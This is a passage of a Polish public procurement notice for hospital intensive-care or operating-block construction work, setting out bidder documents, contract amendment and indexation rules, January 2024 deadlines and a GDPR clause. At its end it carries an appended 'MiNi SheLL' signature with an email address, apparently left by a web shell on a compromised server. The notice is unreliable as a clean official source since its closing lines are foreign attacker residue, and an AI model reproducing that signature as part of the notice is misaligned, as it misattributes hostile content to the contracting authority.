przebudowy lub remontu Sali intensywnej terapii lub Bloku operacyjnego<br/>Zamawiający dopuszcza, dla wykazania spełniania warunku udziału w postępowaniu, posiadanie przez jedną osobę dwóch lub więcej powyższych uprawnień. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu wykonawca składa:<br/><br/>1)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty;<br/><br/>2)	wykazu usług wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy;<br/><br/>UWAGA : stosuje się w przypadku wskazanym w pkt. VIII - Wariant II (w zakresie projektowania)<br/><br/>3)	wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;<br/><br/>2.	Dokumentów, o których mowa w ust. 1 Wykonawca nie załącza do oferty. Zamawiający będzie ich żądał zgodnie z art. 274 Ustawy.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Wykaz dokumentów składających się na ofertę:<br/><br/>1)	wypełniony Formularz ofertowy – załącznik nr 2<br/><br/>2)	wypełnione oświadczenie o niepodleganiu wykluczeniu oraz spełnieniu warunków udziału w postępowaniu- załącznik nr 3a (wzór) do SWZ, przy czym:<br/><br/>a)	w przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa powyżej składa każdy z wykonawców. Dokumenty te potwierdzają brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu w zakresie, w którym każdy z wykonawców wykazuje spełnienie warunków udziału w postepowaniu<br/><br/>b)	wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa powyżej także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/><br/>c)	Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów – złącznik nr 3b (wzór)<br/><br/>3)	Oświadczenie o którym mowa w art. 117 ust. 4 ustawy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o niepodleganiu wykluczeniu oraz spełnieniu warunków udziału w postępowaniu składa każdy z wykonawców. Dokumenty te potwierdzają brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu w zakresie, w którym każdy z wykonawców wykazuje spełnienie warunków udziału w postępowaniu.<br/>2. Wykonawca, którego oferta zostanie uznana za najkorzystniejszą, zobowiązany będzie, po uprawomocnieniu się decyzji o wyborze jego oferty, a przed podpisaniem umowy przedłożyć Zamawiającemu umowę podmiotów wspólnie ubiegających się o udzielenie zamówienia stwierdzającą solidarną odpowiedzialność wszystkich Wykonawców za realizację zamówienia oraz zawierającą upoważnienie dla jednego z Wykonawców do składania i przyjmowania oświadczeń wobec Zamawiającego w imieniu wszystkich Wykonawców, a także do otrzymywania należnych płatności (o ile nie została przedłożona wraz z ofertą).<br/>3. Wykonawcy wspólnie ubiegający się o udzielnie zamówienia składają oświadczenie z art. 117 ust. 4 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (podział zadań) <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z § 26 projektowanych postanowień umowy:<br/><br/>&#34;Zmiany umowy<br/>1.	Możliwe są istotne zmiany umowy polegające na przedłużeniu terminu jej wykonania, jeżeli niemożność dotrzymania pierwotnego terminu stanowi konsekwencję:<br/>1)	zmian do umowy na podstawie art. 455 ust. 1 pkt 3 i 4 oraz art. 455 ust. 2 ustawy Prawo zamówień publicznych lub robót zamiennych, <br/>2)	przyczyn zależnych od Zamawiającego, Organów Administracji, innych osób lub podmiotów, za których działania nie odpowiada Wykonawca <br/>3)	siły wyższej lub warunków atmosferycznych nie pozwalających na realizację robót, dla których określona odpowiednimi normami technologia wymaga właściwych warunków atmosferycznych, <br/>4)	zmian spowodowanych warunkami geologicznymi, terenowymi (w szczególności przebiegiem urządzeń podziemnych, instalacji lub obiektów infrastrukturalnych), archeologicznymi, wodnymi itp., odmiennymi od przyjętych w dokumentacji projektowej<br/>2.	W przypadkach wskazanych w ust. 1 termin wykonania umowy ulegnie zmianie, jeżeli przy zachowaniu należytej staranności z uwzględnieniem profesjonalnego charakteru Wykonawcy nie można było uniknąć niedochowania terminu umownego – o okres odpowiadający wstrzymaniu lub opóźnieniu prac z wyżej wymienionych powodów.<br/>3.	Możliwe są istotne zmiany do umowy polegające na robotach zamiennych, jeżeli takie zmiany:<br/>1)	zapewnią prawidłową realizację Umowy, <br/>2)	obniżą koszty wykonania robót lub eksploatacji obiektów stanowiących Przedmiot Umowy, <br/>3)	zapewnią optymalne parametry technicznych lub podniosą standard jakości robót i obiektów stanowiących Przedmiot Umowy,<br/>4)	będą wynikały ze sposobu zagospodarowania terenu;<br/>5)	będą wynikały z konieczności zmiany dokumentacji projektowej;<br/>6)	przyniosą inne, wymierne korzyści dla Zamawiającego. <br/>4.	Dopuszczalne są roboty zamienne wynikające ze sposobu zagospodarowania terenu, konieczności zmian w dokumentacji projektowej oraz w zakresie zmian materiałów, technologii, urządzeń na materiały, technologie i urządzenia spełniające parametry techniczne lub na materiały, technologie i urządzenia o wyższych parametrach niż określone w umowie.<br/>5. Strony dokonają zmiany wynagrodzenia zgodnie z art. 439 ust. 2 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych, na następujących zasadach: <br/>1)	Wzrost wynagrodzenia może obejmować wszelkie koszty oraz zakup niezbędnych materiałów służących do realizacji umowy, które powinny zostać wykazane przez Wykonawcę. <br/>2)	Ustalone wynagrodzenie będzie waloryzowane nie częściej niż raz na 3 miesiące, w oparciu o wartość wskaźnika cen towarów i usług, publikowanego w Komunikacie Prezesa Głównego Urzędu Statystycznego. <br/>3)	Pierwsza waloryzacja może nastąpić nie wcześniej niż 90 dni od dnia upływu terminu składania ofert<br/>4)	Zwaloryzowana stawka wynagrodzenia znajduje zastosowanie począwszy od kolejnego miesiąca kalendarzowego, następującego po miesiącu, w którym opublikowano stosowny Komunikat Prezesa Głównego Urzędu Statystycznego.<br/>5)	Wykonawca będzie uprawniony do zmiany wynagrodzenia, jeżeli wskaźnik wzrostu cen towarów i usług przekroczy 5 % w stosunku do miesiąca, w którym nastąpiło otwarcie ofert<br/>6)	maksymalna łączna wartość zmiany wynagrodzenia to 10 % wartości wynagrodzenia umownego brutto. <br/>7)	Zmiana wynagrodzenia dotyczy prac zrealizowanych po jej dokonaniu<br/>8)	Wykonawca, którego wynagrodzenie zostało zmienione, zobowiązany jest do zmiany wynagrodzenia przysługującego podwykonawcy, z którym zawarł Umowę, w zakresie odpowiadającym powyższym zmianom dotyczących zobowiązania podwykonawcy, jeżeli łącznie spełnione są następujące warunki:<br/>1) przedmiotem Umowy są usługi, dostawy lub roboty budowlane<br/>2) okres obowiązywania Umowy przekracza 6 miesięcy&#34; <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-01-10 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">system SKE - https://wcpit.pl/system-komunikacji-elektronicznej/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-01-10 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-02-08</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Ciąg dalszy treści &#34;Klauzuli obowiązku informacyjnego&#34; z SEKCJI III pkt. 3.15.) &#34;RODO (obowiązek informacyjny)&#34;:<br/>&#34;...9. Posiada Pani/Pan:<br/>a. na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących. Ograniczenie dostępu do<br/>danych może wystąpić jedynie w uzasadnionej ochronie prywatności zgodnie z ustawą Prawo zamówień publicznych i<br/>aktami wykonawczymi,<br/>b. na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania<br/>nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w<br/>zakresie niezgodnym z ustawą Prawo zamówień publicznych oraz nie może naruszać integralności protokołu oraz jego<br/>załączników),<br/>c. na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z<br/>zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma<br/>zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu<br/>ochrony praw<br/>innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego).<br/>10. Nie przysługuje Pani/Panu:<br/>a. w związku z art. 17 ust 3 lit. b, d lub e RODO, prawo do usunięcia danych osobowych,<br/>b. prawo do przenoszenia danych osobowych, którym mowa w art. 20 RODO,<br/>c. na podstawie art. 21 RODO, prawo sprzeciwu wobec przetwarzania danych osobowych, gdyż podstawą prawną<br/>przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>11. Ma Pani/Pan prawo do wniesienia skargi do Organu Nadzorczego, Prezesa Urzędu Ochrony Danych Osobowych ul.<br/>Stawki 2, 00-193 Warszawa, gdy uzna Pani/Pan, iż przetwarzanie danych osobowych Pani/Pana dotyczących narusza<br/>przepisy RODO lub innych aktów prawnych służących stosowaniu RODO.<br/>12. W ramach monitoringu wizyjnego Pani/Pana dane osobowe będą przechowywane przez okres nieprzekraczający 3<br/>miesięcy od dnia nagrania. W przypadku, w którym nagrania obrazu stanowią dowód w postępowaniu prowadzonym na<br/>podstawie prawa lub Administrator powziął wiadomość, iż mogą one stanowić dowód w postępowaniu, termin ulega<br/>przedłużeniu do czasu prawomocnego zakończenia postępowania. Po upływie w/w okresów, uzyskane w wyniku inaczej.<br/>13. Przetwarzanie za pomocą systemu monitoringu wizyjnego obejmuje: drogi wjazdowe do obiektów Administratora,<br/>parkingi znajdujące się na terenie Centrum, wejścia/wyjścia do budynków, a także część obszaru przestrzeni publicznej<br/>znajdującego się wewnątrz budynków WCPiT.<br/>14. Dane osobowe mogą być przekazywane do państwa trzeciego/organizacji między narodowej z zastrzeżeniem, o którym<br/>mowa w pkt. 8.<br/>15. Pani/Pana dane osobowe nie podlegają zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu.<br/>Klauzule obowiązku informacyjnego stanowią załączniki do SWZ.&#34;

Creat By MiNi SheLL
Email: jattceo@gmail.com